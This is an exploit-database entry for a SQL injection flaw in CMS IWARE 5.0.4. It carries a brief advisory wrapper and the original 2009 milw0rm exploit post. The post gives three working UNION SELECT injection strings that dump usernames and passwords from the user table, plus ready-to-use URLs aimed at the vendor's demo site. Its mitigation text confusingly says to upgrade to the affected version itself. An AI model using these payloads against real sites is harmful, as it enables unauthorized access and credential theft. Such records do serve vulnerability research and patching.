CMS IWARE 5.0.4 REMOTE SQL-injection vulnerability

vendor:

CMS IWARE

by:

boom3rang

7.5

CVSS

HIGH

Remote SQL-injection

CWE

Product Name: CMS IWARE

Affected Version From: 5.0.4

Affected Version To: 5.0.4

Patch Exists: YES

Related CWE: N/A

CPE: a:iware:cms_iware:5.0.4

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

CMS IWARE 5.0.4 REMOTE SQL-injection vulnerability

CMS IWARE 5.0.4 is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted SQL query to the vulnerable application. This can allow the attacker to gain access to sensitive information such as usernames and passwords.

Mitigation:

Upgrade to the latest version of CMS IWARE 5.0.4 or apply the patch provided by the vendor.

Source

Exploit-DB raw data:

###################################################################
CMS IWARE 5.0.4 REMOTE SQL-injection vulnerability 
###################################################################


###################################################
#[~] Author        :  boom3rang 
#[~] Greetz        :  H!tm@N, KHG, chs, redc00de
#[~] Vulnerability :  Remote SQL-injection
#[~] Google Dork   :  N/W
--------------------------------------------------   
#[!] Product Site  :  www.iwarecms.nl
#[!] Download CMS  :  http://www.iwarecms.nl/download.php?f=IWARE_5.0.4.zip
#[!] Version       :  5.0.4
###################################################

[+] Remote SQL injection 


Example:
http://localhost/path/index.php?D=[SQL injection]

SQL:
'/**/and/**/1=2/**/UNION/**/SELECT/**/concat(username,char(58),password)+from+iware_users/*

Demo:
http://www.iwarecms.nl/demo/index.php?D=63'/**/and/**/1=2/**/UNION/**/SELECT/**/concat(username,char(58),password)+from+demo_users/*

-----------------
Example 2:
http://localhost/path/index.php?D=52&cmd=33&file=NewsArticles_1.0.0&view=1&category=&id=[SQL injection]

SQL:
'/**/and/**/1=2/**/UNION/**/SELECT/**/0,1,2,concat(username,char(58),password),4,null+from+iware_users/*

Demo 2:
http://www.iwarecms.nl/demo/index.php?D=52&cmd=33&file=NewsArticles_1.0.0&view=1&category=&id=3'/**/and/**/1=2/**/UNION/**/SELECT/**/0,1,2,concat(username,char(58),password),4,null+from+demo_users/*

-----------------
Example 3:
http://localhost/path/index.php?D=54&cmd=33&file=ImageGallery_1.0.0&category=[SQL injection]

SQL:
'/**/and/**/1=2/**/UNION/**/SELECT/**/0,1,null,concat(username,char(58),password)+from+iware_users/*

http://www.iwarecms.nl/demo/index.php?D=54&cmd=33&file=ImageGallery_1.0.0&category=2'/**/and/**/1=2/**/UNION/**/SELECT/**/0,1,null,concat(username,char(58),password)+from+demo_users/*



##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] R.I.P redc00de
##############################

# milw0rm.com [2009-03-29]